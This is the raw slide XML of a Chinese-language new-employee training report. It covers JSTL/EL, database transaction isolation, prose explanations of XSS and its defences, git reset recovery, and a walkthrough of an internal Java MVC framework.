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02" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="279" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="282" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="284" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="288" r:id="rId15"/>
    <p:sldId id="258" r:id="rId16"/>
    <p:sldId id="259" r:id="rId17"/>
    <p:sldId id="260" r:id="rId18"/>
    <p:sldId id="262" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="268" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="270" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="265" r:id="rId26"/>
    <p:sldId id="266" r:id="rId27"/>
    <p:sldId id="267" r:id="rId28"/>
    <p:sldId id="271" r:id="rId29"/>
    <p:sldId id="272" r:id="rId30"/>
    <p:sldId id="273" r:id="rId31"/>
    <p:sldId id="274" r:id="rId32"/>
    <p:sldId id="275" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="299" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="303" r:id="rId43"/>
    <p:sldId id="30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D7"/>
    <a:srgbClr val="D13B3B"/>
    <a:srgbClr val="F8D0D0"/>
    <a:srgbClr val="492207"/>
    <a:srgbClr val="1A7C34"/>
    <a:srgbClr val="B5EDB6"/>
    <a:srgbClr val="8BFF96"/>
    <a:srgbClr val="9BF16B"/>
    <a:srgbClr val="115322"/>
    <a:srgbClr val="D15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58" autoAdjust="0"/>
    <p:restoredTop sz="75217" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="20" d="100"/>
          <a:sy n="20" d="100"/>
        </p:scale>
        <p:origin x="29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C1DE-A6DA-4017-9553-3C39AEEBAE8E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4A15D-43C4-42BC-8F47-5807BA179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2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從他的名稱就可以知道他跟前端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2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方便讀取資料的一種語法，取得後端、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等資料，可判斷、運算，不可修改值、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8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JSTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從字面上來看就是一個充滿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，他的功能是包裝常用方法，達到程式碼複用，不用每次都重新寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，同時也因為表達比較精簡，可以讓程式碼更加美觀，例如如果使用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原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet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判斷，頁面就會變得非常複雜與醜陋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5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2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上述交易控制可以用來維持交易四大原則</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原子性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資料庫單元操作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沒有全部執行，就都不能執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性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假設「張三」客戶欲從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轉入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元到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，交易前「張三」在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元，在交易完成後，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的總和必須還是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元，因此，在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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的帳戶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總額是相同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隔離性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不會影響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其它交易的執行結果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或被其它交易所干擾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6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各自連線存取資料庫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能不滿足原子性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共用連線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共用連線進行資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>commit/rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常運作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除了使用交易控制來管理交易</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也可以透過資料表的鎖定來維持四大原則，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DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要有隔離層級，不同狀況採用不同的隔離層級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03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第一個交易修改資料，而第二個交易在第一個交易「確認前」讀取修改的資料。如果第一個交易中途發生故障，必須撤回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的情況。第二個交易將取得不正確的資料。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在查詢時，而交易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卻還可以進行更新新增與刪除的問題，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無法重覆讀取到相同結果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這些裡面的東西大部份都是我自行蒐集，整理之後的內容，所以如果有講的不好、不對的地方請多多包容，報完之後也糾正我的錯誤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9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兩次取得的筆數不相同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https://hackertarget.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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就是惡意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的程式碼在網站讀取時執行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，通常透過一些前端語言例如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來反映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例如有人在這個網頁放入惡意的程式碼，當使用者瀏覽這個網頁的時候就會啟動這個惡意程式嗎，這時候使用者的一些機密資料可能就會被竊取、傳回給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Reflection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>網站會反映出輸入的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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發現更改帳密的時候透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變數來傳遞資料，這時候他就可以直接在變數上面放入惡意程式碼，然後透過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方式打包，再接結果寄給使用者，使用者若點選這個網址就會執行攻擊者放入的功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dom:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 惡意程式碼的輸出位置在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端，例如這個網址會將頁面導到一個利用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取值得網頁，且這個網頁會把取到的值直接當成網頁內容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並把他們當成網頁中的內容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1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造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的攻擊主要在於具有特殊涵義的符號字元被當成指令來使用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80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的一些防禦方法</a:t>
            </a:r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的設定，例如這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ajaxfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，他可以指定什麼時候要進行過濾。當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傳入之後，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可以進行過濾的功能，就像一層濾紙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡面去做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，當我故意在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欄輸入一個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，就會啟動她，最後會跳出這個小視窗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>儲存參數使用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fn:escapeXml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9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這是我的自選主題，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是一套功能強大的分散式版本控管系統，今天我會特別介紹他的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復原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是一套分散式版本控管系統，例如支援本地操作、備份容易、功能強大且彈性的分支與合併等等。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92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由這三個區塊所組成，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管理的資料夾、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站存處、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檔案庫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綠色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表目前狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為相對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>名稱，最新的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點永遠為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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>絕對名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>雜湊運算出來的亂碼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78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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之後會不斷創造節點，那如何回到之前節點的狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?----&gt;reset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reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就只是把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HEAD(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移動到指定結點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>各參數之間的差異就只是在資料恢復的範圍，決定是否把原來 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>working tree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中的資料內容一起 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>成指定結點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623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假如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完成了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的功能，接下來開始做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功能，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>head~1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只是微小更新，最後做出了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現在想剃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除微小更動的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，可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset –soft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移到原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>head~2</a:t>
            </a:r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會</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回復到原本的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的檔案狀態，但快取跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>working</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>卻不會變動，也就是維持在為成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>功能的狀態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這時候就可以重新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，得到一個比較乾淨的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1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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的時候可能加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>錯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案，就可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset—mix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，他就是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的預設方法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中的檔案回到目標節點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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這時候就可以重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>add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–cached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從快取移除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一定要確保之前有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節點，使用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要確定有加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cached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中也會移除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1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MVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這種架構，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>model…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負責的工作為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m.v.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就像三顆緊密相依的螺絲一樣個體間彼此是獨立的，擁有自己的齒輪大小，但是又必須互相配合才能讓機器，也就是我們的網站運轉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而使用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的好處就是我們可以讓專精於不統領域的人一起工作，例如有人前端比較強就負責打造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這顆齒輪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54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功能，但是後來的兩個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卻亂七八糟，想要放棄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目前本地的所有變更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就可以執行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-hard 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來強制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恢復所有資料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內容及狀態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92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執行一些指令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reset)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能會在演進圖上找不到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的版本節點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reflog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找到特殊參考名稱來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset –hard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>復原到原本找不到的節點位置了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架構，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，也就是顯示畫面並且與使用者做第一線的互動</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http dispatcher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txbean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，他們的工作類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>deliverer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，或者說交通警察的功能，幫忙把使用者要求的訊息傳遞給後端，或把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的訊息帶回來前端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Mod.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共用模組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則是屬於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，他們的工作就是邏輯的處理，或者資料庫的異動請求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接下來要稍微介紹一下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的流程，首先在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啟動之後，會先將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做初始化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Log4jAwareDispatche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，這個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裡面會進行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，裡面有個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>會清除快取，並且儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m_namingMappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，裡面就是儲存主程式的相關資訊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完成之後就會處於等待狀態，等待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的進入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breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 40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BeanProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 54 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alwaysClearCache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59(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m_namingMappings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清掉快取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m_namingMappings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map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃過所有檔案，儲存相關資訊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完接著進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request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4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的傳入，也就是使用者作出了請求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我們需要取得一串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才能對應到正確的程式與方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般情況下，我們要前往另一個頁面會直接給定一個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，例如利用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來導頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比較特別的是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不像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直接給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，因此需要其他方法取得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前面的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取得方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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/XXWeb/servlet/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${dispatcher}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include file=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“/html/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cathaybk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/common/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header.jsp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CXL:csCommon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“dispatcher” /&gt;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“/CXL” prefix=“CXL” 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it-IT" altLang="zh-TW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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csCommon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>對應到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&lt;tag-class&gt;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com.cathay.common.tag.cs.CsCommonTag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&lt;/tag-class&gt;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strContext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=&gt;&gt;(/XXWeb + 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CSRUtil.AjaxHandler.request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡調用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>jQuery or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529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CSRUtil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傳到後端找到對應的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0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之後，要將這串網址傳給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也就是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去尋找對應的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，例如這邊就是對應到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，所以她就會去呼叫這個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因為有點好奇怎麼呼叫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，因此有去看底層程式碼的運作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1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request: breakpoint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Log4jAwareDispatcher 157(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doPost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70(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m_requestHandler.doTrx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上面雖然是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，但是底層還是都用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HtmlRequestHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 126(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141: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aconst_null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RequestHandler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137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144: aload_1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55(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super.doAction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114(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getBeanDescByAnnotation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123(response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handler.execute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TxHandler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249(251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空白行進入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148 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=….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XXT0_0200 55(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)&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>trx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;&gt;mod&gt;&gt;….. &gt;&gt;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>回傳繼續執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>沒找了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0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這邊我們用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>來做舉例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用者再前端操作，傳送一個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，透過剛剛介紹的方法利用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找到對應的程式名稱與方法後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(XXT0_0200)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，程式就會呼叫對應的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，並且將資料傳送給他，讓她進行驗證處理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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再把資料傳給對應的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，讓他對資料庫進行操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主程式回傳結果會丟到上一頁最後的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599-4928-4429-A382-741AC1E59060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20C4-D4EB-4537-A7BC-8E2745466239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7E15-CBC9-47E1-AA69-A01228C8EF0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AEC-30CE-4A07-AC0B-4D6BCD54D0B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D0-6F69-40EC-8AA9-4FFE5A102CC3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931-9DC5-4ABF-8DCA-8BBE3F617477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C54A-ACC3-4686-84EC-F9F058C32A9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7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B97C-30FA-40BF-9872-A15A175529D6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8779-660B-49ED-B3A4-B4B80A4852E9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0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0A71-EAFD-454E-9F15-E586F10C3B32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918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FF6C-72F8-4950-97A4-DAB005426392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74A4-9D60-403E-8A2E-D9F2678C605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C5C8-29FC-4EC6-A499-8478B58CD733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1A1F-79F1-49CF-853D-D1397560FBEE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79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8EF6-C4FD-4B4A-B377-298EF2226075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557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99B8-2CC1-4E7C-AF77-180B43B87FD4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27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E9B-5CD9-48CF-8810-1DA5EA6F19A0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7706-E8F9-48F6-958F-DC58D8E21745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22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1CD5-15BF-4ABD-919A-3505D55C35C9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02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6DD-777C-4E80-8504-098F2F75524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7FCC-AD15-4F4C-B295-9AC75652C140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2008-7F61-4808-9A04-90DC00B62E45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131-82BC-4923-BBA3-FD2C40C45BA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8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7E91-0906-445E-9E52-424DB30D1E26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AFE4-9E20-4D4D-8074-AAD2008DA0C6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21ED-8032-43EF-8340-7F1D41F5CF5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1-B819-48C7-BC38-ECC01B4EC995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A862-7710-4DFB-B309-C6A6FDF48134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23D6-26FC-4B5A-B693-B3FDD0C60A2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新人期末報告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開發一科 盛昱叡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0280083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737175" y="5040023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1290485" y="5015330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27082" y="3616037"/>
            <a:ext cx="753001" cy="1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492298" y="3908872"/>
            <a:ext cx="787785" cy="1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0347278" y="5393629"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30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5361483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86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XXT00200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837981" y="4390639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XXT0_0200_mod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0007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XX_CARS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JSTL&amp;EL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0397" y="398597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JSP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9738" y="3983934"/>
            <a:ext cx="186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Standard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7735" y="3961112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Tag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5498" y="3991056"/>
            <a:ext cx="146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Library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904" y="4585297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Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pages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4885" y="4015946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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Expression Language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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTML: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JSP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Scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>person.getAge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() 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Directive: </a:t>
            </a:r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 smtClean="0"/>
              <a:t>=….%&gt;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EL: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Action: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
